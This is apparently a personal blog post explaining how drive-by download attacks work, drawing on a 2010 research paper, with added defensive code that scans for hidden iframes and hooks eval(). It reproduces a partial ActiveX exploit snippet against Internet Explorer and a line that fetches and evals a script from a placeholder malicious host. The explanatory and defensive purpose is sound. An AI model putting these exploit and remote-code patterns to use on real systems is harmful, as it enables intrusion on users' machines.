Tibo Laperre

another Belgian on the internet


What **ACTUALLY** Happens When You Click Random Links

We all know better than to click on random links. Malware and scams frequently hide behind a mysterious-looking URL, yet a part of me, driven by curiosity, wonders what lies beyond that click. However, I never satisfy that desire because I am uncertain of the mechanisms by which malware could end up on my device. In this post I take away my ignorance on the topic by diving into the nitty-gritty technical details of a drive-by download attack.

I am basing this on a widely cited (924 citations according to Google Scholar) paper from 2010.

Marco Cova, Christopher Kruegel, and Giovanni Vigna: Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code

In a drive-by download, malware is downloaded to a website visitor’s PC without the user’s awareness or consent. A high-level overview is illustrated in the paper.

Suppose the user clicks on a malicious link taking them to a website. Nothing seems to happen; behind the scenes, however, a script tag in the HTML loads an invisible iframe with a width and height of 0 into the browser. The website in that iframe uses the User-Agent HTTP header to determine which browser and OS version the victim is using. Based on that information the website can return different JS scripts that target known vulnerabilities in those versions. An example of a malicious script served to a user running Internet Explorer 6.1 on Windows XP is shown below.

1 function a9_bwCED() {
2   var OBGUiGAa = new ActiveXObject('Sb.SuperBuddy');  // instantiate the vulnerable control
3   if (OBGUiGAa) {
4     Exhne69P();                                        // heap spray, defined elsewhere in the script
5     OBGUiGAa.LinkSBIcons(0x0c0c0c0c);                  // trigger the vulnerability in the control
6   }
7   return 0;
8 }
9 if (a9_bwCED() || g0UnHabs() || P9i182jC()) { ... }   // try each exploit function in turn

The script tries multiple functions until one exploit succeeds. We are showing the function a9_bwCED here, but the others are similar. It first instantiates a vulnerable component (in this case the SuperBuddy control, but it can be different for other user agents). If that component is successfully instantiated, it calls Exhne69P, which puts malicious shellcode in the heap memory of the process. On line 5 an integer overflow vulnerability is exploited; if successful, this causes the injected shellcode to execute. The malicious shellcode could install malware on your PC, encrypt your files or put your device in a botnet.
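The hidden iframe described before the listing (width and height of 0, or hidden via CSS) is something a defender can look for in the HTML a page serves. The scanner below is an added example written for this post; it is not code from the paper or from the post's author. It uses a deliberately simple regex over the raw HTML text, so it also catches an iframe tag written out as a string inside a document.write call, and the sample markup and hostnames are constructed for illustration.

```javascript
'use strict';
// Added example (not from the post or the paper): heuristic scan of raw HTML
// for iframes that render with no visible area, the drive-by pattern above.

// Parse the attributes of one tag into a lowercase name -> value map.
function parseAttributes(tagText) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// True when the iframe would render with zero width/height or is hidden by CSS.
function isHiddenIframe(attrs) {
  const isZero = (v) => v !== undefined && parseFloat(v) === 0;
  if (isZero(attrs.width) || isZero(attrs.height)) return true;
  // Normalise the inline style so "display: none" and "display:none" compare equal.
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  return /display:none|visibility:hidden|(?:^|;)(?:width|height):0(?:px)?(?:;|$)/.test(style);
}

// Return every hidden iframe found in the HTML text, with its src for triage.
function findHiddenIframes(html) {
  const findings = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[1]);
    if (isHiddenIframe(attrs)) {
      findings.push({ src: attrs.src || '', tag: m[0] });
    }
  }
  return findings;
}

// Constructed sample page: one legitimate embed, one 0x0 iframe written by a
// script, and one iframe hidden with CSS. Hostnames are placeholders.
const SAMPLE_HTML = `
<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example/embed" width="560" height="315"></iframe>
<script>
document.write('<iframe src="http://landing.example.invalid/x" width="0" height="0"></iframe>');
</script>
<iframe src="http://other.example.invalid/y" style="display: none"></iframe>
</body></html>`;

for (const f of findHiddenIframes(SAMPLE_HTML)) {
  console.log('hidden iframe ->', f.src);
}
```

A zero-size iframe is not proof of malice on its own (tracking pixels and some analytics use the same trick), so the output is a triage list: the src values are what you would look up against threat intelligence or load in a sandboxed analyser such as the one the paper describes.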

Unfortunately, it is hard to detect malicious scripts statically because of the dynamic features JavaScript provides. The eval() function makes it possible to run code that is provided as a string argument. This makes it possible to fetch the JavaScript code from a remote web server at runtime, so that static malware detection tools cannot see what will be executed inside the eval call.

fetch('http://malicious.example.com/malicious-script.js')
  .then(response => response.text())
  .then(code => eval(code));
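Because the string handed to eval() only exists at runtime, the usual answer (and the approach the paper takes with its dynamic analysis) is to observe the script while it runs rather than read it. The snippet below is an added example, not code from the post or the paper: it replaces the global eval with a recording wrapper, runs a script, and then applies a keyword check to every string that actually reached eval(). The keyword list and the sample script are constructed for illustration; the sample assembles the identifier ActiveXObject from two halves so a plain text search never sees it.

```javascript
'use strict';
// Added example (not from the post or the paper): make runtime-assembled code
// visible by hooking eval(), in the spirit of the paper's dynamic analysis.

// Constructed list of strings a reviewer might flag in a script.
const SUSPICIOUS_KEYWORDS = ['ActiveXObject', 'unescape(', 'fromCharCode'];

// Static check: which keywords appear literally in the source text?
function staticHits(source) {
  return SUSPICIOUS_KEYWORDS.filter((k) => source.includes(k));
}

// Dynamic check: run the script with eval() replaced by a recording wrapper,
// then apply the same keyword check to every string that reached eval().
function dynamicHits(source) {
  const originalEval = globalThis.eval;
  const observed = [];
  globalThis.eval = function recordingEval(code) {
    const text = String(code);
    observed.push(text);
    return originalEval(text); // indirect eval: evaluates in the global scope
  };
  try {
    originalEval(source); // run the script; its eval() calls hit the wrapper
  } finally {
    globalThis.eval = originalEval; // always put the real eval back
  }
  const hits = new Set();
  for (const text of observed) {
    for (const k of staticHits(text)) hits.add(k);
  }
  return { observed, hits: [...hits] };
}

// Constructed, harmless sample: the identifier is split in the source so it
// only exists as one string at runtime; typeof avoids actually calling anything.
const SAMPLE_SCRIPT = [
  "var objName = 'Active' + 'XObject';",
  "eval('typeof ' + objName);",
].join('\n');

console.log('static :', staticHits(SAMPLE_SCRIPT));   // []
console.log('dynamic:', dynamicHits(SAMPLE_SCRIPT).hits); // [ 'ActiveXObject' ]
```

The same idea scales to the fetch-then-eval pattern above: the code downloaded at runtime is invisible to a scanner that only reads the page, but any analyser that executes the page with an instrumented eval (in an isolated environment, never on a real user's machine) gets to see it. Note that the hook only restores the global eval; a script that saved a reference to the original before the hook was installed would bypass it, which is one reason real analysers instrument the JavaScript engine itself rather than the global object.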

How to protect yourself

You may have noticed that this whole operation relies on the fact that you have a user agent with exploitable vulnerabilities. To greatly decrease your chances of being vulnerable you should always update your OS and browser so that you get the latest security patches.

Full disclosure

I don’t know how relevant this work is for 2024, but it was certainly interesting to me and a nice beginning to answer the question: “How does malware end up on your PC by clicking on a malicious link?”